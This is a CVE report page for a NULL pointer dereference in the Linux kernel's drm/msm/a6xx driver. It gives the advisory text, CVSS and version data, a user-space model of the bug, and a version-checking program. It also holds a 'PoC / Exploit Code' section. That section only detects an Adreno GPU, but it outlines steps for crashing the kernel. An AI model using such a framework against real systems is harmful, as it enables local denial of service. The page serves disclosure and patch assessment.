Security Vulnerability Report
CVE-2025-71124 CVSS 5.5 MEDIUM

CVE-2025-71124

Published: 2026-01-14 15:16:02
Last Modified: 2026-03-25 18:48:11
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drm/msm/a6xx: move preempt_prepare_postamble after error check

Move the call to preempt_prepare_postamble() after verifying that preempt_postamble_ptr is valid. If preempt_postamble_ptr is NULL, dereferencing it in preempt_prepare_postamble() would lead to a crash.

This change avoids calling the preparation function when the postamble allocation has failed, preventing potential NULL pointer dereference and ensuring proper error handling.

Patchwork: https://patchwork.freedesktop.org/patch/687659/
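The ordering error the commit message describes, as an added user-space model (this is not the kernel's a6xx code and not the page's PoC). The struct, the `alloc_postamble()` stand-in for the driver's buffer allocation, and the `force_alloc_failure` / `null_deref_count` hooks are inventions of the model; the only thing it keeps from the real driver is the shape of the bug: the allocation result is used by `preempt_prepare_postamble()` before it is checked. So that both orderings can run in one process, the prepare step counts a NULL pointer instead of dereferencing it; in the kernel that count is an oops.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define POSTAMBLE_DWORDS 64

/* Model of the two fields the bug touches; names follow the commit message. */
struct a6xx_gpu_model {
    uint32_t *preempt_postamble_ptr;   /* CPU address of the postamble buffer, NULL if alloc failed */
    size_t preempt_postamble_len;      /* dwords written by the prepare step */
};

/* Model-only test hooks: force the allocation to fail, count uses of a NULL pointer. */
static int force_alloc_failure;
static int null_deref_count;

void set_alloc_failure(int fail) { force_alloc_failure = fail; }
int get_null_deref_count(void) { return null_deref_count; }
void reset_null_deref_count(void) { null_deref_count = 0; }

/* Stands in for the GEM buffer allocation (hypothetical); returns NULL on failure. */
static uint32_t *alloc_postamble(void)
{
    if (force_alloc_failure)
        return NULL;
    return calloc(POSTAMBLE_DWORDS, sizeof(uint32_t));
}

/*
 * Writes the postamble packets through preempt_postamble_ptr. The real function
 * writes unconditionally; here a NULL pointer is counted rather than dereferenced
 * so the vulnerable ordering can be demonstrated without crashing the demo.
 */
static void preempt_prepare_postamble(struct a6xx_gpu_model *gpu)
{
    uint32_t *buf = gpu->preempt_postamble_ptr;

    if (buf == NULL) {
        null_deref_count++;            /* in the kernel: NULL deref, oops */
        return;
    }
    buf[0] = 0x70000000u;              /* constructed placeholder "packet header" */
    buf[1] = 0x00000001u;              /* constructed placeholder payload */
    gpu->preempt_postamble_len = 2;
}

/* Before the fix: prepare runs before the allocation result is checked. */
int preempt_init_vulnerable(struct a6xx_gpu_model *gpu)
{
    gpu->preempt_postamble_ptr = alloc_postamble();
    preempt_prepare_postamble(gpu);        /* uses the pointer even when it is NULL */
    if (gpu->preempt_postamble_ptr == NULL)
        return -ENOMEM;                    /* the check exists, but too late */
    return 0;
}

/* After the fix: check the allocation first, prepare only on success. */
int preempt_init_fixed(struct a6xx_gpu_model *gpu)
{
    gpu->preempt_postamble_ptr = alloc_postamble();
    if (gpu->preempt_postamble_ptr == NULL)
        return -ENOMEM;
    preempt_prepare_postamble(gpu);
    return 0;
}

void preempt_fini(struct a6xx_gpu_model *gpu)
{
    free(gpu->preempt_postamble_ptr);
    gpu->preempt_postamble_ptr = NULL;
    gpu->preempt_postamble_len = 0;
}

int main(void)
{
    struct a6xx_gpu_model gpu = { 0 };
    int ret;

    set_alloc_failure(1);
    ret = preempt_init_vulnerable(&gpu);
    printf("vulnerable ordering, alloc fails: ret=%d, NULL derefs=%d\n", ret, get_null_deref_count());

    reset_null_deref_count();
    ret = preempt_init_fixed(&gpu);
    printf("fixed ordering, alloc fails:      ret=%d, NULL derefs=%d\n", ret, get_null_deref_count());

    set_alloc_failure(0);
    ret = preempt_init_fixed(&gpu);
    printf("fixed ordering, alloc succeeds:   ret=%d, postamble dwords=%zu\n", ret, gpu.preempt_postamble_len);
    preempt_fini(&gpu);
    return 0;
}
```

The general lesson is the one the patch applies: any function that writes through a pointer returned by a fallible allocation must sit after the failure check, and a reviewer should look for the same pattern wherever an error label is reached after a "prepare" or "init" helper rather than before it.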

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Vector breakdown: Attack Vector Local, Attack Complexity Low, Privileges Required Low, User Interaction None, Scope Unchanged; Confidentiality None, Integrity None, Availability High (exploitability sub-score 1.8, impact sub-score 3.6). The rating reflects a local denial of service (kernel crash) only; no confidentiality or integrity impact is assessed for this bug.
Weakness
CWE-476 (NULL Pointer Dereference)

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 6.13.1, versionEndExcluding 6.18.3)
cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:* - VULNERABLE
Linux Kernel (drm/msm/a6xx) in versions before the fix
Fix commit: 2c46497eb148ec61909f4101b8443f3c4c2daaec
Fix commit: ef3b04091fd8bc737dc45312375df8625b8318e2
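A check of whether a kernel's version string falls inside the ranges listed above, as an added C example that is not part of this page or of any NVD tooling. It encodes the configuration data exactly as given: the 6.13 release, 6.13.1 up to but not including 6.18.3, and 6.19-rc1 through 6.19-rc8; other -rc kernels are not listed and are reported as not affected. Two caveats a practitioner should keep in mind: distribution kernels backport fixes under unchanged version numbers, so a match means "look for the fix commits in the changelog or driver source", not "confirmed vulnerable"; and the code in question only runs on hardware driven by the msm a6xx GPU driver.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/utsname.h>

struct kver {
    int major, minor, patch;
    int rc;   /* 0 for a release, N for an -rcN kernel */
};

/*
 * Parse the leading "major.minor[.patch][-rcN]" of a uname -r string such as
 * "6.18.2-arch1-1" or "6.19.0-rc3". Anything after that prefix (flavor,
 * build id) is ignored. Returns 0 on success, -1 if the prefix is not a version.
 */
int parse_kver(const char *s, struct kver *v)
{
    char *end;

    memset(v, 0, sizeof(*v));
    v->major = (int)strtol(s, &end, 10);
    if (end == s || *end != '.')
        return -1;
    s = end + 1;
    v->minor = (int)strtol(s, &end, 10);
    if (end == s)
        return -1;
    s = end;
    if (*s == '.') {
        s++;
        v->patch = (int)strtol(s, &end, 10);
        if (end == s)
            return -1;
        s = end;
    }
    if (strncmp(s, "-rc", 3) == 0) {
        s += 3;
        v->rc = (int)strtol(s, &end, 10);
        if (end == s || v->rc <= 0)
            return -1;
    }
    return 0;
}

/* Compare release numbers only (major.minor.patch); rc is handled separately. */
static int kver_cmp(const struct kver *a, const struct kver *b)
{
    if (a->major != b->major) return a->major < b->major ? -1 : 1;
    if (a->minor != b->minor) return a->minor < b->minor ? -1 : 1;
    if (a->patch != b->patch) return a->patch < b->patch ? -1 : 1;
    return 0;
}

/*
 * Affected set, taken from the NVD configuration on this page:
 *   - 6.13 (the release) and 6.13.1 <= v < 6.18.3
 *   - 6.19-rc1 .. 6.19-rc8
 */
int kver_affected(const struct kver *v)
{
    static const struct kver lo = { 6, 13, 0, 0 };
    static const struct kver hi = { 6, 18, 3, 0 };

    if (v->rc)
        return v->major == 6 && v->minor == 19 && v->patch == 0 &&
               v->rc >= 1 && v->rc <= 8;
    return kver_cmp(v, &lo) >= 0 && kver_cmp(v, &hi) < 0;
}

/* 1 = inside the listed ranges, 0 = outside, -1 = string is not a version. */
int version_string_affected(const char *s)
{
    struct kver v;

    if (parse_kver(s, &v) < 0)
        return -1;
    return kver_affected(&v);
}

int main(void)
{
    struct utsname u;
    int r;

    if (uname(&u) < 0) {
        perror("uname");
        return 1;
    }
    r = version_string_affected(u.release);
    if (r < 0)
        printf("%s: could not parse kernel version\n", u.release);
    else
        printf("%s: %s the NVD affected range for CVE-2025-71124%s\n",
               u.release, r ? "inside" : "outside",
               r ? " (check for backported fix commits)" : "");
    return 0;
}
```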

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2025-71124: Linux kernel drm/msm/a6xx NULL pointer dereference
 *
 * Local DoS PoC framework. As written it only detects an msm (Adreno) DRM
 * device and reads its GPU ID; it does not itself reach the vulnerable code,
 * which runs when the preemption postamble allocation fails and
 * preempt_prepare_postamble() is called with preempt_postamble_ptr == NULL.
 *
 * Note: This requires a system with a Qualcomm Adreno A6xx GPU and a modified
 * environment to trigger the specific failure condition in preempt_postamble_ptr.
 *
 * Compile: gcc -o cve202571124_poc cve202571124_poc.c
 * Run:     ./cve202571124_poc   (render nodes are usually readable without root;
 *          use sudo if /dev/dri is not accessible)
 *
 * Author: Security Researcher
 * Date: 2026-01-14
 */
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

/*
 * UAPI definitions copied from include/uapi/drm/drm.h and
 * include/uapi/drm/msm_drm.h so the file builds without libdrm headers.
 * The earlier version of this PoC used made-up ioctl numbers and passed a bare
 * parameter id as the ioctl request, which no kernel would accept.
 */
#define DRM_IOCTL_BASE      'd'
#define DRM_COMMAND_BASE    0x40
#define DRM_MSM_GET_PARAM   0x00
#define MSM_PIPE_3D0        0x10
#define MSM_PARAM_GPU_ID    0x01

struct drm_msm_param {
    uint32_t pipe;    /* in: MSM_PIPE_x */
    uint32_t param;   /* in: MSM_PARAM_x */
    uint64_t value;   /* out for get_param */
    uint32_t len;     /* zero for non-pointer params */
    uint32_t pad;     /* must be zero */
};

#define DRM_IOCTL_MSM_GET_PARAM \
    _IOWR(DRM_IOCTL_BASE, DRM_COMMAND_BASE + DRM_MSM_GET_PARAM, struct drm_msm_param)

/* Ask the msm driver for the GPU id; fails with ENOTTY/EINVAL on non-msm devices. */
static int query_gpu_id(int drm_fd, uint64_t *gpu_id)
{
    struct drm_msm_param req;

    memset(&req, 0, sizeof(req));
    req.pipe = MSM_PIPE_3D0;
    req.param = MSM_PARAM_GPU_ID;
    if (ioctl(drm_fd, DRM_IOCTL_MSM_GET_PARAM, &req) < 0)
        return -errno;
    *gpu_id = req.value;
    return 0;
}

int trigger_gpu_preemption_failure(int drm_fd)
{
    uint64_t gpu_id;
    int ret;

    /*
     * This PoC attempts to trigger the NULL pointer dereference by:
     * 1. Opening the DRM device with an a6xx GPU
     * 2. Submitting GPU commands that trigger preemption
     * 3. Manipulating memory conditions to cause postamble allocation failure
     *
     * In a vulnerable kernel, this leads to a NULL pointer dereference in
     * preempt_prepare_postamble() when preempt_postamble_ptr is NULL.
     *
     * The actual exploitation requires:
     * - A system with a Qualcomm Adreno A6xx GPU
     * - Ability to manipulate GEM objects and command submission
     * - Triggering memory pressure to cause postamble allocation failure
     *
     * This is a simplified demonstration structure: only step 1 and the
     * device identification are implemented here.
     */
    printf("[*] Attempting to trigger CVE-2025-71124...\n");
    printf("[*] Target: drm/msm/a6xx preempt_prepare_postamble NULL check\n");

    ret = query_gpu_id(drm_fd, &gpu_id);
    if (ret < 0) {
        printf("[!] Failed to query GPU ID: %s\n", strerror(-ret));
        return -1;
    }
    printf("[+] GPU ID 0x%llx retrieved, device may be vulnerable\n",
           (unsigned long long)gpu_id);
    printf("[*] Full exploitation requires specific GPU command submission\n");
    printf("[*] Check dmesg for a kernel oops after triggering preemption\n");
    return 0;
}

int main(void)
{
    const char *device_paths[] = {
        "/dev/dri/card0", "/dev/dri/card1", "/dev/dri/renderD128", NULL
    };
    int found = 0;

    printf("=== CVE-2025-71124 PoC ===\n");
    printf("Linux kernel drm/msm/a6xx NULL pointer dereference\n\n");

    for (int i = 0; device_paths[i] != NULL; i++) {
        int drm_fd = open(device_paths[i], O_RDWR | O_CLOEXEC);
        if (drm_fd < 0)
            continue;
        printf("[*] Opened %s\n", device_paths[i]);
        if (trigger_gpu_preemption_failure(drm_fd) == 0)
            found = 1;
        close(drm_fd);
    }
    if (!found)
        printf("[!] No msm DRM device answered (not an Adreno system, or no access to /dev/dri)\n");

    printf("\n[*] Note: This PoC is a framework. Full exploitation requires:\n");
    printf("    - Specific a6xx GPU hardware\n");
    printf("    - Memory manipulation to cause postamble alloc failure\n");
    printf("    - GPU command buffer crafting\n");
    return 0;
}

References

https://git.kernel.org/stable/c/2c46497eb148ec61909f4101b8443f3c4c2daaec (Patch)
https://git.kernel.org/stable/c/ef3b04091fd8bc737dc45312375df8625b8318e2 (Patch)
https://patchwork.freedesktop.org/patch/687659/ (upstream patch submission, cited in the description)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71124", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:02.110", "lastModified": "2026-03-25T18:48:10.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/a6xx: move preempt_prepare_postamble after error check\n\nMove the call to preempt_prepare_postamble() after verifying that\npreempt_postamble_ptr is valid. If preempt_postamble_ptr is NULL,\ndereferencing it in preempt_prepare_postamble() would lead to a crash.\n\nThis change avoids calling the preparation function when the\npostamble allocation has failed, preventing potential NULL pointer\ndereference and ensuring proper error handling.\n\nPatchwork: https://patchwork.freedesktop.org/patch/687659/"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ndrm/msm/a6xx: mover preempt_prepare_postamble después de la verificación de errores\n\nMover la llamada a preempt_prepare_postamble() después de verificar que preempt_postamble_ptr es válido. Si preempt_postamble_ptr es NULL, desreferenciarlo en preempt_prepare_postamble() llevaría a un fallo.\n\nEste cambio evita llamar a la función de preparación cuando la asignación del postámbulo ha fallado, previniendo la desreferencia potencial de puntero NULL y asegurando un manejo de errores adecuado.\n\nPatchwork: https://patchwork.freedesktop.org/patch/687659/"}], "metrics": {"cvssMetricV31": [{"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "nvd@nist.gov", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2c46497eb148ec61909f4101b8443f3c4c2daaec", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ef3b04091fd8bc737dc45312375df8625b8318e2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}